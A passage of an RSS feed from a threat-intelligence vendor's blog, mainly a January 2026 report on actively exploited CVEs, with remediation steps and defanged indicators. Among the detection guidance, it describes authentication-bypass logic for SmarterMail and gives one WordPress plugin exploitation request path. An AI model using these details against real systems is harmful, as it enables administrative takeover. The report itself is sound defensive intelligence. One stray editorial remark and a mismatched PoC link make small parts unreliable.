            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Latin America's Cybersecurity Turning Point: From Reactive Defense to Threat Intelligence]]></title>
            <link>https://www.recordedfuture.com/ko/blog/latin-america-cybersecurity-turning-point</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/latin-america-cybersecurity-turning-point</guid>
            <pubDate>Tue, 03 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Latin America's threat landscape is evolving fast — and reactive defense is no longer enough. PIX fraud, ransomware, and targeted attacks are outpacing overstretched security teams. Recorded Future provides LATAM-specific intelligence, automation, and seamless integrations to help your team get ahead of threats before they hit.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Latin America faces a distinct and evolving cyber threat landscape, from PIX payment fraud to ransomware hitting critical infrastructure.</li>
          <li>Most LATAM security teams are still reactive by necessity, and that posture is costing organizations in downtime, data, and trust.</li>
          <li>Recorded Future offers LATAM-specific threat intelligence, automation, and 100+ integrations to help stretched teams get ahead of attacks before they land.</li>
          <li>Meet us at RSA Booth N-6090 to see how intelligence-led security can transform your team's posture, from response to prevention.</li>
          <li>Join our upcoming webinar to learn what proactive intelligence looks like for your region.<br />Understanding the Dark Covenant, Its Evolution, and Impact</li>
        </ul>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_17ffeff1c5b7cfe37313bfcf34dda6673c3c7026d.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Recorded Future Expands Coverage of Scams and Financial Fraud with Money Mule Intelligence from CYBERA]]></title>
            <link>https://www.recordedfuture.com/ko/blog/recorded-future-money-mule-intelligence-cybera</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/recorded-future-money-mule-intelligence-cybera</guid>
            <pubDate>Thu, 26 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future is expanding its payment fraud prevention capabilities through a partnership with CYBERA, the industry leader in detecting and verifying data on scam-linked bank accounts.]]></description>
            <content:encoded><![CDATA[
        <p>Recorded Future is expanding its payment fraud prevention capabilities through a partnership with <a href="https://www.cybera.io/company/contact">CYBERA</a>, the industry leader in detecting and verifying data on scam-linked bank accounts.</p>
        <p>Available for purchase now via the Recorded Future Platform, Money Mule Intelligence helps fraud teams identify the accounts criminals use to extract and move stolen funds—addressing a critical gap as scams increasingly become banks' most pressing fraud challenge.</p>
        <h2><strong>The Growing Threat of Authorized Push Payment Fraud</strong></h2>
        <p>Authorized Push Payment (APP) fraud is accelerating. In the U.S., APP fraud losses are projected to reach nearly $15B by 2028, up from $8.3B in 2024, according to <a href="https://www.deloitte.com/us/en/insights/industry/financial-services/authorized-push-payment-fraud.html">Deloitte</a>. While traditional card fraud continues to decline, APP fraud is climbing, fueled by AI-generated deepfakes, personalized scam scripts, and instant payment systems like FedNow and Zelle that move money faster than conventional fraud controls can intercept it.</p>
        <p>Mule accounts, or money mules, are part of the critical infrastructure that makes these scams possible. They provide the bridge that converts stolen payments into untraceable cash or cryptocurrency. Without them, most APP fraud would collapse because criminals cannot risk receiving funds directly into their own accounts. By the time victims realize they've been scammed, mule accounts have already moved the money through multiple layers, typically ending in cash withdrawals or crypto conversions.</p>
        <p>Additionally, the sophistication of mule operations is increasing. Criminal organizations now employ "mule herders" who manage hundreds of accounts at once, using AI to simulate normal transaction behavior (grocery purchases, streaming subscriptions, etc.) so accounts don't appear dormant or suspicious. This makes detection through traditional pattern analysis increasingly difficult.</p>
        <p>Regulators are responding by shifting liability to banks, often viewing those allowing mule accounts to operate as part of the criminal infrastructure itself. For example, the UK now requires banks to reimburse scam victims and allows them to delay suspicious payments for investigation, while U.S. regulators are signaling that banks may be held liable for failing to detect mule accounts.</p>
        <p>Detecting mule accounts is fundamentally difficult. They’re designed to blend in with legitimate activity, and traditional fraud controls can struggle to distinguish between a genuine customer payment and a scam transfer until it's too late.</p>
        <h2><strong>CYBERA's Approach to Mule Intelligence</strong></h2>
        <p>The challenge of detecting and disrupting mule account networks is what led CYBERA's founders to build their solution. Coming from legal practice and law enforcement, CYBERA's leadership team worked scam cases where they witnessed how recovery becomes impossible once funds move through the financial system. They realized that money mule networks represent a central vulnerability in the scam economy, one that banks had limited visibility into.</p>
        <p>Today, CYBERA helps banks and payment networks disrupt scams at the point where funds are extracted. CYBERA's AI-powered Scam Engagement System generates intelligence on bank accounts and payment endpoints actively used by scam networks.</p>
        <p>Unlike probabilistic risk scoring, CYBERA verifies each account, providing evidence and contextual metadata to enable proactive prevention across both internal accounts and outbound payments while minimizing false positives.</p>
        <p>CYBERA supports two core use cases:</p>
        <ul>
          <li><strong>On-Us Mule Detection</strong>, which helps identify mule accounts held at your institution that are already linked to confirmed scam activity. This enables early detection and disruption of high-risk accounts, reducing downstream fraud, repeat victimization, and regulatory exposure within a bank’s accountholders.</li>
          <li><strong>Off-Us Screening</strong>, which screens outbound payments to external beneficiary accounts before execution, helping to prevent customers from sending funds to scammer-controlled accounts. This is particularly valuable for high-value transfers, social engineering attacks, and customer-initiated payments where traditional controls are limited.</li>
        </ul>
        <p>Large financial institutions have already prevented multiple six-figure losses by embedding CYBERA’s intelligence into their transaction monitoring workflows. CYBERA has also been accepted as a member of the Mastercard Start Path program, making it the first Recorded Future partner to achieve this distinction and further validating its role in the payments ecosystem.</p>
        <h2><strong>How Money Mule Intelligence Expands Payment Fraud Intelligence</strong></h2>
        <p><a href="https://www.recordedfuture.com/ko/products/payment-fraud-intelligence">Payment Fraud Intelligence</a> (PFI) correlates the widest set of disparate, pre-monetization indicators of fraud to help teams act before their customers are impacted. Money Mule Intelligence extends that capability, giving fraud teams the verified intelligence needed to make high-confidence decisions that disrupt scams by flagging accounts that have been confirmed as mule infrastructure through direct investigation. Together, they provide coverage from initial compromise through attempted cash-out, helping fraud teams prevent losses at multiple intervention points.</p>
        <div>
          <div>
            <div>“Securing payments requires more than reacting to fraud — it requires anticipating it. Integrating Money Mule Intelligence strengthens our ability to illuminate the infrastructure behind financial crime, which is fully aligned with our strategy of securing payments with intelligence.”</div>
          </div>
          <div>
            <div>
              <p><strong>Jamie Zajac</strong></p>
              <p>Chief Product Officer at Recorded Future</p>
            </div>
          </div>
        </div>
        <p>As regulators increasingly expect banks to prevent scam-enabled transfers, Money Mule Intelligence provides the verified data needed to comply with emerging reimbursement requirements while reducing the operational burden of post-incident investigation and remediation.</p>
        <p>PFI users that purchase this capability, can now act on both sides of the transaction—compromised payment instruments and scam-linked receiving accounts—with evidence-backed intelligence that minimizes false positives and aligns with the industry's shift toward proactive fraud prevention.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1f90928a17759f89a1ada2a65299215200ab27b00.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[January 2026 CVE Landscape: 23 Critical Vulnerabilities Mark 5% Increase, APT28 Exploits Microsoft Office Zero-Day]]></title>
            <link>https://www.recordedfuture.com/ko/blog/january-2026-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/january-2026-cve-landscape</guid>
            <pubDate>Tue, 24 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[January 2026 saw 23 actively exploited CVEs, including APT28’s Microsoft Office zero-day and critical auth bypass flaws impacting enterprise systems.]]></description>
            <content:encoded><![CDATA[
        <p>January 2026 saw a modest 5% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 23 vulnerabilities requiring immediate remediation, up from 22 in December 2025. Noteworthy trends last month included Russian state-sponsored exploitation of a Microsoft Office zero-day and critical authentication bypass flaws affecting enterprise infrastructure.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>APT28's Operation Neusploit:</strong> Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants</li>
          <li><strong>Microsoft and SmarterTools lead concerns:</strong> These vendors accounted for 30% of January's vulnerabilities, with multiple critical authentication bypass and RCE flaws</li>
          <li><strong>Public exploits proliferate:</strong> Fourteen of the 23 vulnerabilities reported have public proof-of-concept exploit code available</li>
          <li><strong>Code Injection dominates:</strong> CWE-94 (Code Injection) was the most common weakness type, followed by CWE-288 (Authentication Bypass Using an Alternate Path or Channel) and CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)</li>
        </ul>
        <p><strong>Bottom line:</strong> The slight increase masks significant threats. APT28's zero-day exploitation and multiple critical authentication bypass flaws demonstrate that threat actors continue targeting enterprise communication and management platforms for initial access and persistence.</p>
        <h2>Quick Reference Table</h2>
        <p><em>All 23 vulnerabilities below were actively exploited in January 2026.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20029">CVE-2026-20029</a></div>
            <div>99</div>
            <div>Cisco Identity Services Engine Software</div>
            <div>CWE-611 (Improper Restriction of XML External Entity Reference)</div>
            <div>No</div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20805">CVE-2026-20805</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20805&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>3</div>
            <div><a href="http://CVE-2026-20931">CVE-2026-20931</a></div>
            <div>99</div>
            <div>Microsoft Windows</div>
            <div>CWE-73 (External Control of File Name or Path)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-23550">CVE-2026-23550</a></div>
            <div>99</div>
            <div>Modular DS Plugin</div>
            <div>CWE-266 (Incorrect Privilege Assignment)</div>
            <div><a href="https://github.com/search?q=CVE-2026-23550&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24061">CVE-2026-24061</a></div>
            <div>99</div>
            <div>GNU InetUtils</div>
            <div>CWE-88 (Argument Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-24061&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-20045">CVE-2026-20045</a></div>
            <div>99</div>
            <div>Cisco Unified Communications Manager</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20045&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-23760">CVE-2026-23760</a></div>
            <div>99</div>
            <div>SmarterTools SmarterMail</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div><a href="https://github.com/search?q=CVE-2026-23760&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24423">CVE-2026-24423</a></div>
            <div>99</div>
            <div>SmarterTools SmarterMail</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div><a href="https://github.com/search?q=CVE-2026-23760&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-21509">CVE-2026-21509</a></div>
            <div>99</div>
            <div>Microsoft Office</div>
            <div>CWE-807 (Reliance on Untrusted Inputs in a Security Decision)</div>
            <div><a href="https://github.com/search?q=CVE-2026-21509&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-24858">CVE-2026-24858</a></div>
            <div>99</div>
            <div>Fortinet Multiple Products</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div><a href="https://github.com/search?q=CVE-2026-24858&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-40551">CVE-2025-40551</a></div>
            <div>99</div>
            <div>SolarWinds Web Help Desk</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div>No</div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-1281">CVE-2026-1281</a></div>
            <div>99</div>
            <div>Ivanti Endpoint Manager Mobile (EPMM)</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-1281&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2026-1340">CVE-2026-1340</a></div>
            <div>99</div>
            <div>Ivanti Endpoint Manager Mobile (EPMM)</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2026-1340&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>14</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2018-14634">CVE-2018-14634</a></div>
            <div>99</div>
            <div>Linux Kernel</div>
            <div>CWE-190 (Integer Overflow or Wraparound)</div>
            <div><a href="https://github.com/search?q=CVE-2018-14634&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>15</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-52691">CVE-2025-52691</a></div>
            <div>99</div>
            <div>SmarterTools SmarterMail</div>
            <div>CWE-434 (Unrestricted Upload of File with Dangerous Type)</div>
            <div><a href="https://github.com/search?q=CVE-2025-52691&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>16</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2024-37079">CVE-2024-37079</a></div>
            <div>99</div>
            <div>Broadcom VMware vCenter Server</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div>No</div>
          </div>
          <div>
            <div>17</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-68645">CVE-2025-68645</a></div>
            <div>99</div>
            <div>Synacor Zimbra Collaboration Suite (ZCS)</div>
            <div>CWE-98 (PHP Remote File Inclusion)</div>
            <div><a href="https://github.com/search?q=CVE-2025-68645&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>18</div>
            <div><a href="http://CVE-2025-34026">CVE-2025-34026</a></div>
            <div>99</div>
            <div>Versa Concerto</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div>No</div>
          </div>
          <div>
            <div>19</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-31125">CVE-2025-31125</a></div>
            <div>99</div>
            <div>Vite Vitejs</div>
            <div>CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), CWE-284 (Improper Access Control)</div>
            <div><a href="https://github.com/search?q=CVE-2025-31125&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>20</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-54313">CVE-2025-54313</a></div>
            <div>99</div>
            <div>Prettier eslint-config-prettier</div>
            <div>CWE-506 (Embedded Malicious Code)</div>
            <div>No</div>
          </div>
          <div>
            <div>21</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-8110">CVE-2025-8110</a></div>
            <div>89</div>
            <div>Gogs</div>
            <div>CWE-22 (Path Traversal)</div>
            <div><a href="https://github.com/search?q=CVE-2025-8110&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>22</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2009-0556">CVE-2009-0556</a></div>
            <div>89</div>
            <div>Microsoft Office</div>
            <div>CWE-94 (Code Injection)</div>
            <div>No</div>
          </div>
          <div>
            <div>23</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/CVE-2025-37164">CVE-2025-37164</a></div>
            <div>89</div>
            <div>Hewlett Packard Enterprise OneView</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-37164&amp;type=repositories">Yes</a></div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in January based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends in January 2026</h2>
        <h3>Affected Vendors</h3>
        <ul>
          <li><strong>Microsoft</strong> faced four critical vulnerabilities across Windows and Office products, including APT28's zero-day exploitation of CVE-2026-21509</li>
          <li><strong>SmarterTools</strong> accounted for three critical vulnerabilities affecting SmarterMail, all enabling authentication bypass or RCE</li>
          <li><strong>Cisco</strong> saw two critical flaws in Identity Services Engine and Unified Communications Manager</li>
          <li><strong>Ivanti</strong> dealt with two pre-authentication RCE vulnerabilities in Endpoint Manager Mobile</li>
          <li>Additional affected vendors/projects: Fortinet, SolarWinds, Broadcom, Synacor, Versa, Hewlett Packard Enterprise, GNU, Linux, Vite, Prettier, Gogs, and Modular DS</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-94</strong> – Code Injection</li>
          <li><strong>CWE-288</strong> – Authentication Bypass Using an Alternate Path or Channel</li>
          <li><strong>CWE-200</strong> – Exposure of Sensitive Information to an Unauthorized Actor</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong>APT28's Operation Neusploit</strong> <strong>marked January's most sophisticated campaign:</strong></p>
        <ul>
          <li>Exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files</li>
          <li>Deployed MiniDoor, a malicious Outlook VBA project designed to collect and forward victim emails to hardcoded addresses</li>
          <li>Deployed PixyNetLoader, which staged additional components and culminated in a Covenant Grunt implant</li>
          <li>Abused Filen API as a C2 bridge between the implant and actor-controlled Covenant listener</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2026-21509 | Microsoft Office</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | Active exploitation by APT28</p>
        <p><strong>Why this matters:</strong> Zero-day exploitation by Russian state-sponsored actors bypasses Office security features, enabling delivery of email collection implants and backdoors. The vulnerability stems from reliance on untrusted inputs in security decisions, allowing unauthorized attackers to bypass OLE mitigations.</p>
        <p><strong>Affected versions:</strong> Microsoft 365 and Microsoft Office (versions not specified in advisory)</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Install Microsoft's out-of-band update released January 26, 2026</li>
          <li>Search email systems for RTF attachments with embedded malicious droppers</li>
          <li>Check for modifications to %appdata%\Microsoft\Outlook\VbaProject.OTM</li>
          <li>Review registry keys: HKCU\Software\Microsoft\Office\16.0\Outlook\Security\Level, Software\Microsoft\Office\16.0\Outlook\Options\General\PONT_STRING, and Software\Microsoft\Office\16.0\Outlook\LoadMacroProviderOnBoot</li>
          <li>Monitor for connections to 213[.]155[.]157[.]123:443 and remote connectivity to Microsoft Office CDN endpoints</li>
          <li>Hunt for scheduled tasks named "OneDriveHealth" and suspicious files in %programdata%\Microsoft\OneDrive\setup\Cache\SplashScreen.png</li>
          <li>Block email addresses: ahmeclaw2002@outlook[.]com and ahmeclaw@proton[.]me</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1d8e4dc50a83f9e11b1c9b0b7e1e5476bd9fb3016.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="779" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2026-21509 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <div></div>
        <h3>CVE-2026-23760 | SmarterTools SmarterMail</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added January 26, 2026</p>
        <p><strong>Why this matters:</strong> Unauthenticated attackers can reset system administrator passwords without any credentials or prior access, enabling complete administrative takeover and potential RCE through volume mount command injection.</p>
        <p><strong>Affected versions:</strong> SmarterTools SmarterMail prior to build 9511</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Upgrade to build 9511 or later immediately</li>
          <li>Review administrator account activity logs for unauthorized password resets</li>
          <li>Check Volume Mounts configuration for suspicious command entries (this one IS correct for SmarterMail)</li>
          <li>Review administrator access patterns and session logs</li>
          <li>Audit system for unauthorized changes made with compromised admin access</li>
        </ul>
        <div></div>
        <h3>CVE-2026-1281 &amp; CVE-2026-1340 | Ivanti Endpoint Manager Mobile</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: CVE-2026-1281 added January 29, 2026</p>
        <p><strong>Why this matters:</strong> Pre-authentication RCE vulnerabilities in EPMM enable unauthenticated attackers to execute arbitrary code by exploiting Apache RewriteMap helper scripts that pass attacker-controlled strings to Bash.</p>
        <p><strong>Affected versions:</strong> Ivanti EPMM 12.5.0.0 and earlier, 12.5.1.0 and earlier, 12.6.0.0 and earlier, 12.6.1.0 and earlier, and 12.7.0.0 and earlier</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Install temporary fixes via RPM packages: EPMM_RPM_12.x.0 - Security Update - 1761642-1.0.0S-5.noarch.rpm and EPMM_RPM_12.x.1 - Security Update - 1761642-1.0.0L-5.noarch.rpm</li>
          <li>Plan migration to EPMM 12.8.0.0 (scheduled for Q1 2026 release)</li>
          <li>Monitor for unusual Apache RewriteMap activity</li>
          <li>Review logs for crafted HTTP parameters to app store retrieval routes</li>
          <li>Check for unauthorized code execution attempts via RewriteRule handling</li>
        </ul>
        <p><strong>Exposure:</strong> EPMM instances accessible over corporate networks or VPN connections</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13dd09f2863edb79f18c40c52cdf0379e47eecaf5.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="790" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Risk Rules History from</em> <em><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2026-1340 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Technical Deep Dive: Exploitation Analysis</h2>
        <h3>APT28's Operation Neusploit (CVE-2026-21509)</h3>
        <p><strong>The multi-stage attack chain:</strong> CVE-2026-21509 enables bypass of Office OLE mitigations through weaponized RTF files:</p>
        <ul>
          <li><strong>Initial delivery</strong> <strong>–</strong> Specially-crafted RTF file exploits CVE-2026-21509</li>
          <li><strong>Server-side evasion</strong> <strong>–</strong> Malicious DLL returned only for requests from targeted geographies with an expected HTTP User-Agent</li>
          <li><strong>Dropper variants</strong> <strong>–</strong> Two distinct infection paths deployed based on targeting:
            <ul>
              <li><strong>Variant 1 (MiniDoor):</strong> Writes VBA project to Outlook, modifies registry settings to enable macro execution, forwards emails to hardcoded recipient addresses</li>
              <li><strong>Variant 2 (PixyNetLoader):</strong> Creates mutex asagdugughi41, decrypts embedded payloads using rolling XOR key, establishes persistence via COM hijacking</li>
            </ul>
          </li>
        </ul>
        <p><strong>Why this matters:</strong> APT28 demonstrates sophisticated exploitation combining zero-day vulnerabilities with anti-analysis techniques, targeting government and business users for email collection and persistent access.</p>
        <div></div>
        <h3>Modular DS WordPress Plugin Exploitation (CVE-2026-23550 &amp; CVE-2026-23800)</h3>
        <p><strong>The authentication bypass chain:</strong> CVE-2026-23550 enables administrator-level access without authentication:</p>
        <ul>
          <li>Plugin treats requests as trusted based on request-supplied indicators rather than cryptographic verification</li>
          <li>/api/modular-connector/login flow grants access based on site connector enrollment state</li>
          <li>If no user identifier is supplied, the code selects an existing administrative user and establishes a privileged session</li>
          <li>CVE-2026-23800 represents the second exploitation path via REST API user creation: /?rest_route=/wp/v2/users&amp;origin=mo&amp;type=x</li>
        </ul>
        <p><strong>Known IoCs associated with CVE-2026-23550:</strong></p>
        <ul>
          <li>45[.]11[.]89[.]19</li>
          <li>185[.]196[.]0[.]11</li>
          <li>64[.]188[.]91[.]37</li>
        </ul>
        <p><strong>Known IoCs associated with CVE-2026-23800:</strong></p>
        <ul>
          <li>62[.]60[.]131[.]161</li>
          <li>185[.]102[.]115[.]27</li>
          <li>backup[@]wordpress[.]com</li>
          <li>backup1[@]wordpress[.]com</li>
        </ul>
        <p><strong>Why this matters:</strong> WordPress plugin vulnerabilities enable threat actors to compromise multiple sites from a single centralized management platform, amplifying attack impact.</p>
        <div></div>
        <h3>SmarterMail Authentication Bypass (CVE-2026-23760)</h3>
        <p><strong>The password reset flaw:</strong> CVE-2026-23760 exposes privileged password reset to anonymous callers:</p>
        <ul>
          <li>ForceResetPassword controller attribute explicitly permits unauthenticated access</li>
          <li>Backend ForcePasswordReset routine branches on client-supplied IsSysAdmin boolean rather than deriving account type from server-side context</li>
          <li>System administrator branch performs basic checks, then sets Password directly from the supplied NewPassword</li>
          <li>Logic fails to validate OldPassword, lacks an authenticated session requirement, and omits authorization controls</li>
        </ul>
        <p><strong>Why this matters:</strong> Complete administrative takeover without credentials enables threat actors to deploy web shells, modify configurations, and establish persistent access to mail server infrastructure.</p>
        <h2>Detection &amp; Remediation Resources</h2>
        <h3>Nuclei Templates from Insikt Group®</h3>
        <p>Recorded Future customers can access Nuclei templates for:</p>
        <ul>
          <li><strong>CVE-2025-8110 (Gogs) -</strong> Version detection and fingerprinting check</li>
          <li><strong>CVE-2026-23760 (SmarterMail) -</strong> Authentication bypass validation</li>
        </ul>
        <h3>Recorded Future Product Integrations</h3>
        <ul>
          <li><strong><a href="https://www.recordedfuture.com/ko/products/vulnerability-intelligence">Vulnerability Intelligence</a></strong> – Prioritize based on active exploitation data, including APT28 targeting</li>
          <li><strong><a href="https://www.recordedfuture.com/ko/products/attack-surface-intelligence">Attack Surface Intelligence</a></strong> – Discover exposed SmarterMail, Ivanti EPMM, and Modular DS assets</li>
          <li><strong><a href="https://www.recordedfuture.com/ko/products/third-party-intelligence">Third-Party Intelligence</a></strong> – Monitor vendor vulnerabilities across your supply chain</li>
        </ul>
        <h2>January 2026 Summary</h2>
        <p><strong>State-sponsored zero-days return.</strong> APT28's exploitation of CVE-2026-21509 demonstrates continued Russian interest in email collection and persistent access through Office vulnerabilities.</p>
        <p><strong>Authentication bypass dominates enterprise risk.</strong> Multiple critical flaws in SmarterMail, Modular DS, and Cisco products enable complete administrative takeover without credentials.</p>
        <p><strong>Legacy vulnerabilities persist.</strong> CVE-2009-0556 (Microsoft Office) highlights how threat actors continue targeting unretired systems where patching has lagged for over a decade.</p>
        <h2>Take Action</h2>
        <p>Ready to see how Recorded Future can help your team detect state-sponsored exploitation, prioritize authentication bypass fixes, and reduce enterprise attack surface? Explore our <a href="https://www.recordedfuture.com/ko/demo">demo center</a> for live examples, or dive deeper with <a href="https://www.recordedfuture.com/ko/research">Insikt Group research</a> for technical threat intelligence.</p>
        <p><strong>About Insikt Group®:</strong></p>
        <p>Recorded Future's Insikt Group® is a team of elite analysts, linguists, and security researchers providing actionable intelligence to protect organizations worldwide. Our research combines human expertise with AI-powered analytics to deliver timely, relevant threat intelligence on emerging vulnerabilities and threat actor campaigns.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Preparing for Russia’s New Generation Warfare in Europe]]></title>
            <link>https://www.recordedfuture.com/ko/research/preparing-for-russias-new-generation-warfare-in-europe</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/preparing-for-russias-new-generation-warfare-in-europe</guid>
            <pubDate>Tue, 24 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Russia is escalating its hybrid warfare against NATO into a coordinated, full-scale campaign blending cyber attacks, sabotage, and influence operations. Read the full report to understand what New Generation Warfare means for your organization.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Since its full-scale invasion of Ukraine in February 2022, Russia has waged what we assess is largely opportunistic, though increasingly aggressive, hybrid warfare in NATO territory. Moscow has very likely not yet leveraged its full capability to integrate cyber, political, and sabotage tools into a full-scale campaign.</p>
        <p>Over the next two years, Russian President Vladimir Putin will likely escalate Russia’s hybrid warfare campaign against NATO members into a full-fledged campaign likely consistent with a Russian military doctrine called New Generation Warfare (NGW). Putin will likely use this campaign to degrade NATO political unity and defense capabilities, reinforce Russia’s network of overt and covert assets across NATO, and optimize the physical and political environment, should Putin decide to launch a military incursion into NATO territory.</p>
